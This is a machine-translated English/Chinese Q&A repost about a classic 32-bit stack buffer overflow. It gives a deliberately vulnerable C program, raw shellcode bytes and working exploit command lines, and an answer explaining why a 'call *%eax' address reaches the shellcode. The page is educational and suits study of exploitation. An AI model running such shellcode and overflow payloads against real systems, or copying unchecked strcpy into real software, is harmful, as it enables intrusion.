[英]How to explain this buffer overflow vulnerability in C
Given this C program: 鉴于此C程序:
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
char buf[1024];
strcpy(buf, argv[1]);
}
Built with: 内置:
gcc -m32 -z execstack prog.c -o prog
Given shell code: 给定外壳代码:
EGG=$(printf '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/df')
The program is exploitable with the commands: 该程序可通过以下命令进行利用:
./prog $EGG$(python -c 'print "A" * 991 + "\x87\x83\x04\x08"')
./prog $EGG$(python -c 'print "A" * 991 + "\x0f\x84\x04\x08"')
where I got the addresses from: 我从哪里获得地址:
$ objdump -d prog | grep call.*eax
8048387: ff d0 call *%eax
804840f: ff d0 call *%eax
I understand the meaning of the AAAA
paddings in the middle, I calculated the 991 based on the length of buf
in the program and the length of $EGG
. 我了解中间AAAA
填充的含义,我根据程序中buf
的长度和$EGG
的长度计算了991。
What I don't understand is why any of these addresses with call *%eax
trigger the execution of the shellcode copied to the beginning of buf
. 我不明白的是为什么这些带有call *%eax
地址中的任何一个都会触发复制到buf
开头的shellcode的执行。 As far as I understand, I'm overwriting the return address with 0x8048387
(or the other one), what I don't understand is why this leads to jumping to the shellcode. 据我了解,我用0x8048387
(或另一个)覆盖了返回地址,我不明白的是为什么这会导致跳转到shellcode。
I got this far by reading Smashing the stack for fun and profit . 通过阅读“ 粉碎堆栈”获得乐趣和利润,我已经走到了这一步 。 But the article uses a different approach of guessing a relative address to jump to the shellcode. 但是本文使用了另一种猜测相对地址来跳转到Shellcode的方法。 I'm puzzled by why this more simple, alternative solution works, straight without guesswork. 我感到困惑的是,为什么这种更简单的替代解决方案可以正常工作而无需猜测。
The return value of strcpy
is the destination ( buf
in this case) and that's passed using register eax
. strcpy
的返回值是目的地(在这种情况下为buf
),并且使用寄存器eax
传递了该值。 Thus if nothing destroys eax
until main
returns, eax
will hold a pointer to your shell code. 因此,如果在main
返回之前没有什么破坏eax
, eax
将持有一个指向您的shell代码的指针。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.